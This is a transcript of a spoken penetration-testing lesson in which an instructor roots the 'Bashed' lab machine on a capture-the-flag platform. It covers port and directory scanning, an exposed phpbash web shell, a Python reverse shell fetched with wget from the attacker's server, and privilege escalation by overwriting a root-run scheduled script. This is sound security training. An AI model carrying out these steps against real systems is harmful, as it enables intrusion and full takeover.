we did this devil machine, right?
Right. We did the devil machine.
Devil machine, but we said this time we use manual tools, not automation.
Yeah. So we used Metasploit
It's like,
for that machine, right?
yeah, Venom also we use.
Yeah, MSF Venom and Metasploit. We giving you a brief summary of the machine. We find that FTP was open. We find that web server was running on port 80,
Yeah.
and the anonymous login was allowed on FTP. And once we connected to the FTP, we were able to see that okay, the directory, the root directory of the server and the FTP are same.
Yeah, by using payloads, we set a file.
Right. We sent the file, uploaded a reverse shell, got a shell back, executed that shell, got a shell back, and then we used our Metasploit local exploit suggester
Yeah.
for privilege escalation.
Yeah.
Right. Okay. Great. So that was it. That was one way of doing it. Another way was, instead of using MSF Venom to generate your payload, you could have just put some kind of a general ASP reverse shell, okay, and then get it executed and listen it manually without Metasploit framework. That could also have been an option. Okay. Okay. Now for today's session, let's go to machines. And let's search for bashed. Okay, let's do bashed today.
So this is Linux.
This is Linux. Okay, let's just copy this IP address, click on play, and let's reset this machine. So I have deployed the machine to the lab. Simultaneously, let's set up my VPN. I have not set up my VPN yet. Let's do it now. And initialization sequence completed. Let's do check our interface. I have my VPN interface appear here. 10 0, 10 10 14 11. Great. Okay. Let's try to ping my target machine now. I'm able to ping it as well. So the target is going to be bashed for today's session, and the IP address is 10.10.68. Okay. So I believe I must have shared some templates with you for report writing, note taking.
Yeah.
Right, I have shared it. So are you using those templates? Are you taking snapshots, documenting your process while
No,
you are?
I didn't use the template. I have one more template from Offensive Security.
Okay.
That I'm using in Word format.
Okay.
I will also use your templates also.
Okay. Yeah. So the main point is to document the steps. Okay. So it depends upon you. Whatever suits you, you can document it in your own fashion as well. So that is not really mandatory. The only thing that is important is documenting your steps. That is important. Okay. Okay. Let's open a new tab here. Let's go to my bash directory. So I have created a directory named bash here. Okay. Here I have created an nmap directory as well, where I'll be saving my nmap scans. Okay. Let's get back. Let's try to run a very basic nmap scan first of all. Okay. Nothing fancy. a very basic Nmap scan. Still running, 65% done. Meanwhile, behind the scenes, we can just run a full port scan as well. And our basic Nmap scan is completed now. And from the output, you can see that only one port is open. Right. And that is port number 80. HTTP. So let's do nmap -p 80 -scv -O and target IP address. So let's do sudo bang bang. So here you can see that it says it throws me an error, says required root privileges. Okay, so I need to run this command again with sudo. So instead of typing all of this command again, what I'm going to do is I'm going to use this sudo and double exclamation mark. And this is known as sudo bang bang. Okay. So what this means, this is going to run my last command with sudo privileges. This is the command. So let's press enter. And here you can see that it is trying to run the last run command using the sudo. It's a very, you can say it's a sort of shortcut that comes in handy. Okay. Meanwhile, full port scan is running, and in the full port scan, I have found the port 80 is open here.
So, Risha, here we don't need to save any output here.
We need to save the output, but what I am doing is I'm not saving the output. Why? Because I have already ran these scans. Let me just show you. I have these scans here. Cat scan. Okay. Okay, this was my full port scan and which was not completed. Probably that's why I do not have it here. Then I must have ran the second one. That is going to be the this one -p80 scv -o output all format. Okay. I'm not saving the output because I already have it saved. Okay. But for you need to save the outputs of all these scans.
Yeah.
Okay. Okay. So my port 80 scan is completed now. And port 80 scan, version detection scan, OS detection scan is done. And it says that some sort of Apache server is running. Apache version 2.4.18 is running. Okay. And what do we have here? Operating system is some sort of Linux operating system. Linux from 3.12 to 4.4, 4.8. It can be anything between them. You can see 3.12 to 4.8. Okay. HTTP title says that Excel development site is here. So from here I can realize that okay, there is something hosted there. So it would be good if I just go to the browser and check it manually. Okay. So let's go to my browser and let's check it here. Ten 68. It's opening. And it's open now. Okay. So whenever you are going to approach port number 80, whenever there's a website running, what you need to do?
We check for source code.
Right. So there are certain steps that you need to follow 100% of the times. Every time. Every time there's a website, there are certain steps that you need to do.
Yeah.
So one is to explore the website manually. Okay. Just try to explore the website manually. Click here and there, see what you are having at the website. Second step is check the source code. Okay, every page that you are visiting, check the source code, go through the source code, see if there is something suspicious there, see if there is something commented out there. A lot of times what happens is developers are going to leave sensitive data in the comments. Okay. Maybe the website was in the testing environment, maybe it was in the local host environment. At that time, developer saved some password or credentials in the comments of the source code. And then when the website was live, okay, when the website was into the production environment, still those comments were not removed. Maybe developer forgot to remove those comments. Okay, and they are still there in the source code. So this is just an example. Okay, sometimes you can find credentials as well. Sometimes you can find some sensitive information. So okay, so I'm going to hover my mouse here and there, and what I'm looking is I'm looking for what appears here at the bottom. Okay, you can see. Right? So I can see that, okay, this is not redirecting me anywhere else. I'm on the same page. PHP bash is going to redirect me to the /single.html page. And this arrow key is also going to redirect me to the /single.html page. Okay. Okay. Nothing else here. Okay. Let's search for JavaScripts here. Whatever JavaScripts we have. These are certain standards one. Okay. Nothing suspicious here. Okay. Another thing that I am going to do is I'm going to run a directory brute forcing attack against this target. Okay. Can you tell me what is directory brute forcing? Yeah. Left the meeting. Maybe some internet issues.
Hello?
Yeah,
Sorry, Rishabh. My internet was disconnected.
lost the internet.
Yeah, yeah. I'm in our office room. Normally, this end of the room doesn't work properly. Sometimes Wi-Fi is not very good in this.
No issues. Yeah, I thought maybe there's some network issues that side. Probably you are going to join back. Okay.
Yeah.
So I was saying, I was telling you about directory brute forcing.
Mhm.
Okay, so what I said was when I have HTTP running, what I'm going to do is I'm going to do a directory brute force.
Mhm.
Okay. So let's say I'm going to do a directory brute force. My question is, what is directory brute force?
Uh, Actually, so I forgot.
Okay.
Either we change the code.
What we are going to do is we are going to brute force the URL at this point. We want to see what all directories exist here, what all
Mhm.
files or folders exist here, right? Like login.php, login.html, index, admin, something like that.
Mhm.
Okay. So let's take the URL from here. Let's go get back to my terminal. There are a variety of tools that you can use. Okay. For today's session, I'm going to use GoBuster. Okay. So if you have not already installed GoBuster, it is going to be installed using sudo apt install GoBuster. Okay. This is the command that you need to use. Just press enter. I already have it installed.
Mhm.
So I pressed Control plus C. For you, you need to press enter and this is going to be installed. Once this is installed, you can use the tool. So let me show you how can you use the tool. So let's type go buster dir hyphen u. Hyphen u is for URL, target
Mhm.
URL, where you want to brute force, wherever you want
Mhm.
to directly brute force. Okay. Followed by hyphen w flag. So hyphen w is for word list. What kind of word list you want to provide? So I'm going to provide user share word list dub and common.txt. Okay, this is the path for a word list which is already present in my Kali Linux system. Okay, so I'm simply going to use that one. This command is clear.
Yeah. One question, Rishabh. This word list is already pre-existed, or do we need to write?
It's pre-installed. It comes with
Okay.
every Kali.
Okay.
Yeah.
Yeah. Yeah.
So let me try to save the output as well. Uh, let's see. I already have the output saved here.
Mhm.
Let me run it. I'm not saving the output, but if you want to save the output, you need to use hyphen o flag for saving the output, followed by your file name. Let's just make it kirangobus.txt. Okay. So now my output is going to be saved in this file.
Mhm.
Let's run it. It's running and we'll wait for this thing to finish and we'll see if we are able to find something cool here. Meanwhile, it is running. Let's go here and it says PHP bash. PHP bash helps a lot with pen testing. I have tested it on multiple different sites. So I want to search for PHP bash. Like, what is PHP bash? I want to know what is PHP
Mhm.
bash. That's one thing. And as well, I can see a GitHub link in the href section here. At the bottom, you can see.
Mhm.
So I
Yeah.
can just open it.
GitHub. Yeah.
That's one way. Other thing is I can just type PHP bash over here. What is PHP bash? It says it's a semi-interactive web shell.
Mm-hmm.
Okay, its main purpose is to assist pen tests when traditional reverse shells are not possible. Okay, and here I can see it's a terminal emulator. So from this much information, I can understand that there is some sort of web shell running here that I have not been able to find yet, but I'll find it soon. If I'm able to find it, I would be able to execute my OS level commands here because it's a terminal, it's a shell.
Mm-hmm.
Okay, so I would be able to execute my commands on the server. So the GitHub link is here. PHP bash .php, PHP bash .min.php. Okay, license, readme. If you want to know more about it, you can just read through it.
Mm-hmm.
Okay, some sort of screenshots are here. Okay, let's get back here. Let's go here. So in the single.html, I can see the same screenshots are available here as well.
Mm-hmm.
So that means that PHP bash is installed here, but I don't know where it is. I can just try to guess it by typing PHP bash.php or PHP bash.min.php, something like this. Not opening. Just trying to guess, nothing else. Not found. Okay, let's get back. Now here you can see my GoBuster is finished. Okay, so here what are these directories? I've got a lot of 403s. So 400 errors are of no use to me. Okay, I'll be interested in 301s, which is redirect. 200 is okay, which says the page is loading. So slash index.html is an example. We have already visited it, so I'm not going to look into it. Certain things of my interests are like, let me show you here. Let me mark you. Uploads, PHP directory, JS directory, images, and dev. Okay.
Mm-hmm.
So let's try to open them one by one. Okay. Let's start from the top. Let's go to slash dev directory. Slash dev. And when I did slash dev, you can see that this is probably the some sort of developer directory, some sort of directory where these shells have been installed.
Mm-hmm.
You can see the names are same.
Yeah.
So one thing is sure that I have found the shells here. So I'll come back to this point again. Meanwhile, let me just try to explore some other directory like uploads. Uploads is not showing me anything. Let's go to images. Images is giving me some images like logo.png, favicon, arrow. Okay. What else? PHP is a directory. Let's see. Sendmail.php. Let's open it. See. I'm not able to see anything here. Okay. So I'm just trying to explore this output, nothing else. Okay. So rest of the
Yeah.
data is meaningless to me. The only thing that appeals me right now is slash dev. As you can see, I have tried opening all of these directory, but nothing important there. But in slash dev directory, I have PHP shell, web shell installed. Okay. So let's close this. And let's open a shell here. Click on it. And I have some sort of shell here. You can see www data @bash var www html dev. Okay, so I can just type who am I and press enter, and it says I am www data. Okay, so I am
Mhm.
able to execute my terminal commands here on this server. Okay. Okay. So the first thing that I want to check is who am I? I already checked it. I'm a www data. Now, second thing is I want to get a shell back. I want to have a shell, not here, not on the web. I want to have a shell here. I want to interact with my terminal using my terminal here. Okay.
Mhm.
So for that, what I'm going to do is I'm going to check what all languages are supported here so that I can exploit them later on. So let's just type which Python, checking if Python is there, which PHP, which Perl, which Ruby, which um, what else? Python, PHP, Perl.
JSP.
No, JSP, ASP is not relevant here because
So,
this is a Linux server.
mhm.
This is not a Windows server.
Okay.
Okay. So these are certain things that we need to keep in mind, right? That's why I told you that initially we want to do hyphen capital O so
Mhm.
that we keep this thing in our mind while approaching the target. So I'm not concerned with the JSP or ASPs here. I can look for any tool for download. Let's say wget. I want to see if wget is there. Okay. So let's mark it as well. I can see Python is there, PHP is there, Perl is there, and wget is there. Okay. Ruby is not there. So definitely I'll be avoiding Ruby. Okay. As Ruby is not supported by my target. So now I could use any of these languages to get a shell, and I can use wget to upload something to the machine, and then I can use, let's say, PHP to execute it, Python to execute it. So one more thing I can check is I can check for netcat if netcat is installed. Let's do which nc, which ncat. So I just want to know if netcat is possible. Netcat is also there. So now there are a variety of ways to get a shell back. Okay. But what I'm going to do is I'm going to show you a unique way here, that is using Python. Okay. Let's search for Python tty shell. Uh, GitHub. Python pty shells. And here I have, what I'm going to do is I'm going to clone this repo, just copy it, go to your /opt directory, or wherever you can, wherever you are comfortable, you can go. I have it in my opt directory, I believe. Do I have it? Yes, I already have it cloned. I'll show you how you can clone it. Let me go to temp directory. Just type git clone and paste your URL and press enter. And this is going to clone all of those codes which are available in the GitHub repo. Okay.
Mhm.
ls here, and I have it here. cd Okay, great. Let's go back to my OPT one. OPT, or let's just continue here itself. So from here, what I'm going to do is so these are shells basically,
Mhm.
which once executed are going to give me a shell back. So back connect is a reverse shell. I'm going to use this one. Let me read this one, cat. See if I need to modify anything to be modified. Here it is. I need to modify my L host and L port here. Let's do this. Let's do mousepad. Open this file and paste my IP address here, which is 10.10.14.11. And L port is 31337. Let's just simplify it and make it 1234. Okay. Okay, let's save this file. Saved it. And where is my temp directory? Let's try to read it again. Successfully changed it. Let's send this file on my server. So let's go to the server and let's do wget http 10.10.14.11, I believe,
Mhm.
followed by my file name. And before this, I need to start a server on my machine. So let me start a server here. Let's do sudo python 3 -m http.server on port 80. So now my machine has opened port 80 and there's a simple server that is running on my machine. I can confirm this thing here. You can see.
Mhm.
Okay. Okay. So I'm going to download this file and save it using -O. Save it in the temp directory, temp slash with the name as shell.py. So are you able to understand this command, what I'm doing here?
Mhm.
Okay. Let's press enter. And it says 100% done, saved. Okay. So let's just stop it for now. If I just do ls/temp, so there's a file shell.py available there.
Yeah.
Okay. Let's execute this file python/temp/shell.py. And before executing this file, I need to have something to catch the connection as well.
Mhm.
Right. So let me start my listener here, which is going to be done by shell handler, TCP PTY shell handler. So let's run this thing, Python TCP PTY shell handler.py. Too few arguments. I need to mention -b flag. -b is to bind, and I need to bind it to my machine 10, 10, 14, 11, colon port is 1, 2, 3, 4. Press enter. So now my machine is listening for a connection on this port, on this socket basically. So let me show you both of this thing happening side by side. Okay, I can just do this way as well. So now I'm going to press enter here on the browser. Press enter, and on the left hand side you can see I got a shell back.
Yeah.
Okay, so who am I? ifconfig, sorry, ifconfig. So now I am inside the target machine, but with what privileges? With very low level privileges. Okay, let's go to my home directory. Let's do an ls. And here I can see that there are two users. One is Edexcel and one is script manager. Okay, I'm going to switch to a directory, let's say Edexcel, and let's do ls-la. And here I can see that there is a user flag available. Now my question is, can I read this flag?
I think the writing is no option available in this.
So we are going to identify this thing using the permission.
Yeah, let's read right. Yeah.
These are the permissions here. Okay?
Yeah.
Oops. These permissions.
Yeah.
So in the last most permission here, you can see that I have read permissions here. This is for other users. I'm not Edexcel. I am www data. Who am I? I am this www data. Okay, but I can read this flag. So let's just read this flag. Let's do cat user.txt, and I can read this flag. Just copy the flag, go to your hack the box panel and paste the flag here. Okay. So I've successfully found the user flag. Now what? What next?
Now we need to send a file to the server.
Now we need to escalate our privileges to the root user. Okay, so from low level user to high level privileges. So let's see, let's do one thing. Now we are going to explore this machine locally. I'm already inside the machine, and now we need to search for some misconfiguration in this machine that can be used or that can be exploited for privilege escalation. So let's do cd cd script manager. ls-la, and there's nothing here. Okay, let's go to the top most directory, cd // ls-la. Okay, so I went to the topmost directory here, that is root directory, you can see, and I did my ls-la here, and what am I able to find here? There is something unusual here.
There is script manager.
Yeah, the unusual stuff is
Yeah.
that there is a directory here which is owned by script manager. So I'm not yet script manager, but if I'm script
Sure.
manager, this thing is going to be useful. Okay. So first of all, let's see what all commands am I able to run as some other user. So let's do sudo -l to see my privileges. And here I can see that I can do sudo as a script manager without any password, and I can run all the commands. So very quickly, what I'm going to do is sudo -u, okay, or I can just do sudo su script manager, and it says password for www data. I do not know it. Let's just stop it here. Let's do sudo sudo -u script manager /bin/bash. And who am I? Now I have changed or escalated my privileges from www data user to the
Script manager.
script manager. Now I can explore this directory restriction free. Let's go to cd scripts, or let's just do ls-la, and here I can see that there are two files,
Yeah. Test.py and text. Yeah.
and these two files are like, one is Python file, one is text file. The text file is owned by the root.
Yeah.
On the other hand, the Python file
But,
is owned by
well, script manager.
manager.
User.
Okay, so I can definitely try to read these files. Let's try to read both of them. Cat test.py. Read this file. Let's do cat test test.text. Okay, so the Python file is what Python file is doing is it's opening a text file. It is writing something to the file, and in the text file I can see testing
Some
1 to
text.
3.
Yeah. Testing one.
Okay, whatever Python file is writing, it is being written in text file. So from this point, I can deduce one analogy. That is that the Python file is being executed. Okay, and text file is created, test.text.
Yeah.
Another thing that I can deduce from here is, if let's say script manager is running test.py, if script manager user is running, so the output test.txt is also going to be with the permissions of script manager,
Yeah. Because it's
because script manager is running it, right?
running it. Yeah.
But the catch here is, but the test.txt file is running as root. It's
Root
showing
is.
the privileges as root. So what does that mean? That means that test.py must be running with root privileges.
Yeah.
Like you can just observe this thing in your nmap outputs. Okay, let's do cd nmap ls-la, and here in this output you can see that whatever commands I ran with the sudo,
Yeah.
that is
Brutally. Yeah.
whatever I ran without sudo, it is outputting me with the user who ran it. I ran nmap without sudo, normal user. I ran nmap with sudo. So,
Root is okay.
okay, okay. Let's get back here. Okay, and another thing that I can observe here is that there is some, uh, these files are old, but test.txt seems to be latest. Why latest? I can see some date changes here. Let's just check out the latest date here. Just type date and see the current time here. It says September 19, September 19, 027. It is
Mhm.
okay. Let's just do ls-la again and 31. So you can see the file is being overwritten
Overwritten. Yeah. Okay. Yeah.
again and again. Okay. So basically, I can understand from this point is basically there is some sort of a scheduled task in this machine, which is automatically running this Python file with root privileges and writing the output in the text file. Okay, every minute this Python file is getting executed. This logic is clear.
Yeah.
Okay, I can just do ls-la again, and you can see the file modification time changed, file creation time
Yeah.
changed.
1 second. Yeah.
Okay. So from this point, what I can understand is, or what I can think of is, what if I replace this Python file with my malicious Python file, with my malicious reverse shell, let's say, with my shell file, and what is going to happen? This Python file is going to be executed by the root user automatically every minute, and
Yeah.
I'll get a root shell, right?
Mm-hmm. Yeah.
So pretty simple. Let's do this thing. I am back again here. Let's do Python -m sudo python 3 -m http dot server port 80, and I'm going to send this file again. But before that, I'll modify this file and change the port to, let's say, 4321. Save it. And let's run the listener here. Python TCP PTY shell handler 10 -v flag 4321. Now it is listening for an incoming connection on this socket. Okay, let's send this file. Let's do wget http 10 10 14 11 slash hyphen capital O test.py, saving the output as test.py. So you understand this command, what I'm doing here?
Yeah.
Press enter. The file has been downloaded. It has been modified. Let's do cat test.py. Successfully written it. Now we just need to wait 1 minute. Okay, date is 35 colon 35. We just need to wait for it to change to 36. So every minute this file is going to be executed as root user. Let's wait 15 more seconds. 7 more seconds. 1 second more. It's 36 now. 1 minute. Done. Now let's get back to my shell handler and let's see if we are able to find something here. Yes. And here I have my shell back and I can just type who am I, and who am I?
Root user, yeah.
I'm root. Boom. cd/root ls and cat root.txt. Copy the flag and paste the flag here and click on submit flag. Okay. Right.
Yeah.
Any doubt?
No.
Okay. We have successfully rooted this machine. Okay. And there are a lot of different techniques that we learned here. Okay. We saw what is PHP bash. It's a sort of web shell. If you already know, that's good. If you do not know, this is something new. Okay. Then we learn how we can download files from to and fro, from attacker to the victim. Okay. And how to set up a local HTTP server using a single Python one-line command. Okay. If you remember, I use sudo python 3 -m http dot server, right? That was the command for setting up a server quickly. Okay. And how I can use Python PT by shell to get a reverse shell. How can I set it up for handling my shell? Okay. Okay. How we can locally enumerate the machine, that is also important. Okay. And how we can escalate our privileges. So privilege escalation is something like it is going to be different in every machine. Okay. Every time we are going to find something new or something different in privilege escalation. Okay. In previous session, we just did it the automated way using Metasploit. And for today, we did it the manual way. Okay. Yeah, so that's it. Okay. If anything is not clear, you can ask me. Or if everything is clear, let me just type exit here. See, our whole machine is rooted, but this nmap scan did not finish. Okay. Same is the case with the UDP scan as well. If we are going to run a UDP port scan, it is also going to take a lot of time. So actually, I have already scanned these all of these ports, and I found out that no other port than port 80 is open here. Okay, only and only port 80 is open. Only port 80 is running. Okay, so let me just stop the record.